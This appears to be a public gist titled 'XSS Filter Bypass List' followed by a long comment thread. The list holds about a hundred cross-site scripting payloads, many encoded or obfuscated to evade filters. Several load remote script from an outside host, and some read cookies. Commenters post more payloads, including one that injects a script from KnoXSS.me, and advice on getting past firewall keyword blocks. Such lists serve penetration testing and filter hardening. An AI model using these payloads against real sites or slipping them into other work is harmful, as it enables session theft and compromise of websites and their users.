XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
@ninja25538


commented Aug 8, 2017

Nice!, Thanks!

@Noob-Walid


commented Oct 12, 2017

Which ones worked most often?

@Cache-Bounty


commented Apr 6, 2018

test

@CesBear


commented May 8, 2018

cool

@xeno6696


commented May 10, 2018

@Noob-Walid: It's doubtful that any of these are going to "work" right out of the box. You'll want to use a fuzzer against a suspected form field, and see what tag types even partially "make it through." Though, all of these inputs are available at OWASP, and actually are also available from both fuzzdb and SecLists in text files that contain the name "rsnake."

As a matter of fact, all of you should just clone those repos.

@0xINT3


commented Sep 1, 2018

Many don't even work any more; websites are getting smarter. :/

@sittminzaw


commented Sep 5, 2018

"autofocus/onfocus=alert(`Bug´)-->
also work

@IvanGuGon1


commented Jan 1, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
@Marshmellow471


commented Jan 26, 2019

@Marshmellow471


commented Jan 26, 2019

rip github xss protection

@Marshmellow471


commented Jan 26, 2019

here, sons. <img src = x onerror = alert( document.cookies ) >

@Marshmellow471


commented Jan 26, 2019

start with > and without the spaces

@Marshmellow471


commented Jan 26, 2019

fuck

@Marshmellow471


commented Jan 26, 2019

<h1>no</h1>

@Marshmellow471


commented Jan 26, 2019

no

@shamrocksu88


commented Feb 1, 2019

KNOX

@shamrocksu88


commented Feb 1, 2019

KNOX

@shamrocksu88


commented Feb 1, 2019

S05PWA==

@shamrocksu88


commented Feb 1, 2019

PDFLTk9YPDE=

@shamrocksu88


commented Feb 1, 2019

'"KNOX

@shamrocksu88


commented Feb 1, 2019

KNOX\

@shamrocksu88


commented Feb 1, 2019

confirmK

@shamrocksu88


commented Feb 1, 2019

(confirm)(1)

@shamrocksu88


commented Feb 1, 2019

'-confirmK-'

@shamrocksu88


commented Feb 1, 2019

"-confirmK-"

@shamrocksu88


commented Feb 1, 2019

${(confirm)(1)}

@shamrocksu88


commented Feb 1, 2019

1</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72


commented Feb 12, 2019

<sCR<script>iPt>alert(1)</SCr</script>IPt>

@nizeman72


commented Feb 12, 2019

iji

@nizeman72


commented Feb 12, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"</SCRIPT>
@nizeman72


commented Feb 12, 2019

<script>document.write("PT SRC="http://ha.ckers.org/xss.js"></script>
@nizeman72


commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"></script>
@nizeman72


commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"</script>
@nizeman72


commented Feb 12, 2019

<img src=xonerror=alert( document.cookies)>

@nizeman72


commented Feb 12, 2019

<img src = x onerror = alert( document.cookies ) >

@nizeman72


commented Feb 12, 2019

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

@nizeman72


commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72


commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=`https://KnoXSS.me\x2F00?1=6243</script>

@nizeman72


commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72


commented Feb 12, 2019

@nizeman72


commented Feb 16, 2019

Lol

@nizeman72


commented Feb 16, 2019

test

@nizeman72


commented Feb 16, 2019

<script>alert(fuck)</script>
@Yashin2134


commented Feb 22, 2019

@Yashin2134


commented Feb 22, 2019

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@Yashin2134


commented Feb 22, 2019

<SCRIPT>alert("XSS")</SCRIPT>">

@wlanpsk


commented Mar 28, 2019

Mmm

@EDMPL


commented Apr 1, 2019

test

@EDMPL


commented Apr 1, 2019

nice

@s04v


commented Apr 9, 2019

Test

@itayze


commented Apr 13, 2019

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

@ABCyborg25


commented Apr 15, 2019

Hi All,

I am new to InfoSec and need a little help from you dignitaries.

While performing XSS testing, what if my web application firewall is blocking certain words like Alert, Script, etc.?

TIA for your answers!

@m1lw0rm


commented Apr 16, 2019

@m1lw0rm


commented Apr 16, 2019

@T3ap0T


commented Apr 18, 2019

rofl xss in the comments
plz

@UnknownUserG


commented Apr 26, 2019

Prompt('XSS') can be used in place of Alert('XSS') if the alert keyword is blocked

@r3dx00


commented Apr 28, 2019

Markdown allows bold text etc., so why are y'all flexing?

@Pr070n321


commented May 7, 2019

AAA

@Pr070n321


commented May 7, 2019

AAA

@Pr070n321


commented May 7, 2019

AAA

@Pr070n321


commented May 7, 2019

AAA

@Pr070n321


commented May 7, 2019

AAA

@Pr070n321


commented May 7, 2019

s

@Pr070n321


commented May 7, 2019

s

@Pr070n321


commented May 7, 2019

a

@Pr070n321


commented May 7, 2019

a

@Pr070n321


commented May 7, 2019

a

@Pr070n321


commented May 7, 2019

a

@Sachinkumar1245


commented May 9, 2019

"><img src=x onerror=confirm(12);

@DrShrox


commented Jun 25, 2019

a

@DrShrox


commented Jun 25, 2019

<script>alert("xss")</script>
@DrShrox


commented Jun 25, 2019

@darkness203


commented Jun 28, 2019

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@realarrch


commented Jul 1, 2019

TEST
